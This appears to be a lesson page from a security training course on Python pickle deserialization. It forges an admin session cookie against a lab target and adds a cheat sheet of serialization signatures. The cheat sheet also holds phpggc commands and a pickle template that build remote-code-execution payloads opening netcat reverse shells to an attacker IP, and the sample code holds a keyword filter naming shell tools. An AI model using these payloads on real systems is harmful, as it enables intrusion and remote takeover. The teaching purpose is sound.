Introduction to Deserialization Attacks

Object Injection (Python)

Setting our Role

In the previous section, we identified a cookie that contains a serialized util.auth.Session object, which is deserialized each time a user tries to load a page. We saw in the definition for util.auth.Session that isAdmin() returns true if self.role is set to 'admin':

...
    def isAdmin(self):
        return self.role == 'admin'
...

Since cookies are user-controlled data, our first objective is to forge an authentication cookie so that we have the admin role instead of the current user so that isAdmin() will return true and we may access the Admin Panel.

For this exploit, we will need to set up the folder structure to be the same as the project:

[!bash!]$ tree exploit/

exploit/
├── exploit-admin.py
└── util
    └── auth.py

1 directory, 2 files

In the real util/auth.py, the role is selected from the SQLite database, but in our exploit/util/auth.py we want to be able to specify the role, so we will just recreate the structure of Session and define our own constructor where it accepts username and role as parameters. When a class is serialized in Python, the functions defined inside don't matter, only the value of the variables, so we can delete the rest of the functions. Lastly we will copy the util.auth.sessionToCookie and util.auth.cookieToSession functions.

import pickle
import base64

class Session:
    def __init__(self, username, role):
        self.username = username
        self.role = role

def sessionToCookie(session):
    p = pickle.dumps(session)
    b = base64.b64encode(p)
    return b

def cookieToSession(cookie):
    b = base64.b64decode(cookie)
    for badword in [b"nc", b"ncat", b"/bash", b"/sh", b"subprocess", b"Popen"]:
        if badword in b:
            return None
    p = pickle.loads(b)
    return p

With our version of util/auth.py ready, we can work on our main exploit file (exploit-admin.py). We will instantiate a session with an arbitrary username and the admin role and call util.auth.sessionToCookie so we can get the corresponding cookie:

import util.auth

s = util.auth.Session("attacker", "admin")
c = util.auth.sessionToCookie(s)
print(c.decode())

If we run this exploit, we will get a base64-encoded value:

[!bash!]$ python3 exploit-admin.py 

gASVRgAAAAAAAACMCXV...SNIP...b2xllIwFYWRtaW6UdWIu

Testing Locally

Before we run any attacks against the live target, we will test it out locally, like in the PHP sections.

[!bash!]$ python3

Python 3.10.7 (main, Oct  1 2022, 04:31:04) [GCC 12.2.0] on linux
Type "help", "copyright", "credits" or "license" for more information.
>>> import util.auth
>>> s = util.auth.cookieToSession('gASVRgAAAAAAAACMCXV...SNIP...b2xllIwFYWRtaW6UdWIu')
>>> s.username 
'attacker'
>>> s.role
'admin'

We see in the output that s.role was set to admin, so this attack should work.

Running against the Target

We can now overwrite the value of the auth_8bH3mjF6n9 cookie in our browser and try (re-)loading the admin panel to see if it worked, and we can see it has. The website deserialized the cookie we generated and now thinks we are a user named attacker with the admin role.

VPN Servers

Warning: Each time you "Switch", your connection keys are regenerated and you must re-download your VPN connection file.

All VM instances associated with the old VPN Server will be terminated when switching to a new VPN server.
Existing PwnBox instances will automatically switch to the new VPN server.

PROTOCOL

UDP 1337

TCP 443

/ 1 spawns left

Waiting to start...

Questions

Answer the question(s) below to complete this Section and earn cubes!

Target: Click here to spawn the target system!

Download VPN Connection File

+ 8 [http://SERVER_IP:5000] Forge an admin session and submit the flag from /admin

+10 Streak pts

htbooks-src.zip

Previous Next

Go to Questions

My Workstation

OFFLINE

/ 1 spawns left

Cheat Sheet

The cheat sheet is a useful command reference for this module.

Identifying the use of Serialization

White-Box

Function	Language
`unserialize()`	PHP
`pickle.loads()`	Python (Pickle)
`jsonpickle.loads()`	Python (JSONPickle)
`yaml.load()`	Python (PyYAML, ruamel.yaml)
`readObject()`	Java
`Deserialize()`	C#/.NET
`Marshal.load()`	Ruby

Black Box

Bytes	Language
`a:4:{i:0;s:4:"Test";i:1;s:4:"Data";i:2;a:1:{i:0;i:4;}i:3;s:7:"ACADEMY";}`	PHP
`(lp0\nS'Test'\np1\naS'Data'\np2\na(lp3\nI4\naaS'ACADEMY'\np4\na.`	Python 2.x (Pickle Protocol 0)
`80 01` (Hex)	Python 2.x (Pickle Protocol 1)
`80 02` (Hex)	Python 2.3+ (Pickle Protocol 2)
`80 03` (Hex)	Python 3.8+ (Pickle Protocol 4)
`80 04 95` (Hex)	Python 3.x (Pickle Protocol 5)
`["Test", "Data", [4], "ACADEMY"]`	Python 2.7 / 3.6+ (JSONPickle
`- Test\n- Data\n- - 4\n- ACADEMY\n`	Python 3.6+ (PyYAML / ruamel.yaml)
`AC ED 00 05 73 72` (Hex), `rO0ABXNy` (Base64)	Java
`00 01 00 00 00 ff ff ff ff` (Hex), `AAEAAAD/////` (Base64)	C#/.NET
`04 08` (Hex)	Ruby

Exploiting PHP Deserialization

PHPGGC

# List out available gadget chains for a specific framework:
phpggc -l Laravel

# Generate an RCE payload using a specific gadget chain:
phpggc Laravel/RCE9 system 'nc -nv <ATTACKER_IP> 9999 -e /bin/bash' -b

# Generate a payload to exploit a PHAR deserialization vulnerability:
phpggc -p phar Laravel/RCE9 system 'nc -nv <ATTACKER_IP> 9999 -e /bin/bash' -o exploit.phar

Exploiting Python Deserialization

# Template for Pickle RCE exploit:

import pickle
import base64
import os

class RCE:
	def __reduce__(self):
		return os.system, ("nc -nv 1.2.3.4 5555 -e /bin/bash",)

print(base64.b64encode(pickle.dumps(RCE())).decode())

Introduction to Deserialization Attacks

Object Injection (Python)

Setting our Role

Testing Locally

Running against the Target

Questions

Table of Contents

Introduction

Exploiting PHP Deserialization

Exploiting Python Deserialization

Defending against Deserialization Attacks

Skills Assessment

My Workstation